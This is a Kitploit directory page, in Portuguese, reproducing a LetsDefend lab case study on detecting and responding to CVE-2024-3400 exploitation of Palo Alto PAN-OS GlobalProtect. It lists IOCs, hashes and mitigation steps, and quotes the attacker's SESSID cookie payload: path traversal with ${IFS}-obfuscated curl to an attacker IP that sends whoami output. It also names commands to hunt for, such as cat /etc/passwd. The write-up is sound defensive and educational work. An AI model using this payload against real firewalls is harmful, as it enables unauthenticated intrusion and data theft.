Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
letsdefend-cve2024-3400-case-study — Estratégias de detecção, análise e resposta para tentativas de exploração da CVE-2024-3400 direcionadas a portais GlobalProtect do Palo Alto PAN-OS. Inclui IOCs, padrões de exploração e orientações de mitigação. | Kitploit
Ferramentas/GitHubGitHub/cyprianatsyor/letsdefend-cve2024-3400-case-study
Gerenciamento de Indicadores de Comprometimento (IOC)Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebAnálise ForenseForensia DigitalComando e ControleInteligência de AmeaçasAprendizado e Educação

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Resposta a Incidentes
Análise de Logs
GitHubcyprianatsyor/letsdefend-cve2024-3400-case-study

letsdefend-cve2024-3400-case-study

Estratégias de detecção, análise e resposta para tentativas de exploração da CVE-2024-3400 direcionadas a portais GlobalProtect do Palo Alto PAN-OS. Inclui IOCs, padrões de exploração e orientações de mitigação.

Ver Repositório
há 1 anoAinda não revisado

letsdefend-cve2024-3400-case-study

Detecção, análise e estratégias de resposta para tentativas de exploração da CVE-2024-3400 visando portais GlobalProtect do Palo Alto PAN-OS. Inclui IOCs, padrões de exploração e orientações de mitigação.

Investigação do Incidente CVE-2024-3400

🔍 Visão Geral

Este repositório contém uma investigação detalhada e análise de ameaças da CVE-2024-3400, uma vulnerabilidade crítica de injeção de comandos não autenticada que afeta o software Palo Alto Networks PAN-OS, visando especificamente o portal GlobalProtect.

Em 18 de abril de 2024, foi detectada atividade de exploração contra um firewall PAN-OS interno usando o endpoint vulnerável /global-protect/login.esp. O atacante utilizou um cookie SESSID malicioso contendo um comando curl executado entre crases para alcançar um servidor C2 remoto hospedado em 144.172.79.92 (Miami, Flórida). O payload de exploração utilizou ${IFS} para contornar filtros simples e usou o diretório de telemetria do PAN-OS para preparar a atividade maliciosa. O firewall respondeu com 200 OK, indicando que o payload provavelmente foi executado com sucesso.

Visão Geral do Incidente

📄 Resumo do Incidente

  • ID do Evento: 249

  • Regra de Detecção: SOC274 – Exploração de Injeção de Comandos PAN-OS

  • Horário do Evento: 18 de abril de 2024, 03:09 UTC

  • Nome do Host: PA-Firewall-01

  • IP de Destino: 172.16.17.139

  • IP de Origem: 144.172.79.92

  • Método da Requisição: POST

  • Endpoint: /global-protect/login.esp

  • Payload do Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaacurl${IFS}144.172.79.92:4444?user=$(whoami)

  • Hashes Maliciosos:

  • SHA256: 3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac

  • MD5: 0c1554888ce9ed0da1583dbdf7b31651

  • Script Malicioso: (executado usando )

🧠 Inteligência de Ameaças

Inteligência de Ameaças

Passo 1: Detecção inicial da exploração pesquisando no malpedia

Passo 1 da Investigação

Passo 2: Análise e investigação do hash

Passo 2 da Investigação

Passo 3: Outra investigação

Passo 3 da Investigação

Passo 4: Investigação do endereço IP

Passo 4 da Investigação

🧠 Indicadores Comportamentais

  • Abuso do SESSID para injeção de comandos
  • Uso de ${IFS} para evasão
  • Preparação do payload em /opt/panlogs/tmp/device_telemetry
  • Envolvimento do processo dt_send após a exploração
  • Chamada de rede para o IP do atacante na porta 4444

📄 Evidências de Log

Exemplo de Log


🧩 Correlação de Hashes

Correspondência de Hash


✅ Pontos Ganhos no LetsDefend

Pontos Chave

🚨 Impacto

  • Execução remota de comandos não autenticada em um dispositivo de segurança crítico
  • Possível download e execução de payload Python controlado pelo atacante
  • Abuso dos mecanismos internos de telemetria do PAN-OS para preparação ou exfiltração
  • Tráfego permitido a partir de um IP malicioso conhecido

✅ Ações de Resposta Recomendadas

  1. Corrigir o PAN-OS para as versões: 10.2.9-h1, 11.0.4-h1 ou 11.1.2-h3
  2. Bloquear IP Malicioso: 144.172.79.92
  3. Pesquisar Indicadores de Comprometimento (IOCs) em logs e sistemas de arquivos
  4. Inspecionar diretórios de telemetria em busca de arquivos suspeitos ou comportamento de execução
  5. Isolar sistemas afetados e realizar uma análise forense completa

📁 Conteúdo

  • logs/: Logs de detecção processados e brutos
  • ioc/: Hashes de arquivos e IPs associados ao ataque
  • analysis/: Análise aprofundada do comportamento da exploração e rastreamento de processos
  • report/: Resumo e imagens dos logs e códigos das minhas investigações

O que é a CVE-2024-3400

CVE-2024-3400 refere-se a uma vulnerabilidade crítica no Palo Alto Networks PAN-OS, afetando especificamente gateways GlobalProtect. Aqui está um resumo do que é publicamente conhecido sobre ela:

🔥 CVE-2024-3400 – Vulnerabilidade de Injeção de Comandos no Palo Alto PAN-OS

Pontuação CVSS: 10.0 (Crítica)

Publicada: Abril de 2024

Produtos Afetados: PAN-OS 10.2, 11.0 e 11.1 quando o GlobalProtect está habilitado.

Exploração: Confirmada na natureza (zero-day)

Tipo de Vulnerabilidade: Injeção de comandos não autenticada

🧠 Qual é o Risco?

A CVE-2024-3400 permite que atacantes não autenticados executem comandos arbitrários no sistema operacional do firewall. Isso essencialmente dá controle total sobre os dispositivos afetados sem a necessidade de credenciais — um ponto de violação sério para qualquer empresa que dependa de firewalls Palo Alto.

⚠️ Condições Necessárias para Exploração:

O gateway GlobalProtect deve estar habilitado.

Versões específicas do PAN-OS (10.2.x, 11.0.x, 11.1.x).

Explorável pela internet se não estiver atrás de camadas adicionais de segurança.

🔎 O Que os Atacantes Estão Fazendo:

Enviar requisições maliciosas para explorar a falha de injeção.

Implantar shells remotos ou baixar payloads de segundo estágio.

O comportamento observado inclui:

Execução de comandos via URLs maliciosas

Mecanismos de persistência

Movimentação lateral dentro das redes

🛡️ Mitigação e Recomendações:

Corrija Imediatamente: A Palo Alto lançou correções; atualize para versões não vulneráveis (ex.: 10.2.9-h1, 11.0.4-h1, 11.1.2-h3 ou posteriores).

Verifique Indicadores de Comprometimento (IOCs) como processos suspeitos, conexões de saída ou histórico de CLI incomum.

Use ferramentas como Shodan ou inventários de ativos para encontrar dispositivos vulneráveis.

🛠️ Como Investigar (ex.: via LetsDefend ou SIEM):

Procure por IPs externos acessando o GlobalProtect sem autenticação válida.

Verifique a execução de comandos suspeitos nos logs (show system processes, cat /etc/passwd, etc.).

Monitore o comportamento do firewall e alerte sobre conexões de saída anômalas.

Este repositório serve tanto como um relatório de investigação interna quanto como um recurso educacional para defensores que desejam entender a exploração real de vulnerabilidades do PAN-OS. Contribuições e observações adicionais são bem-vindas.

Baixar ferramenta
update.py
/usr/bin/python3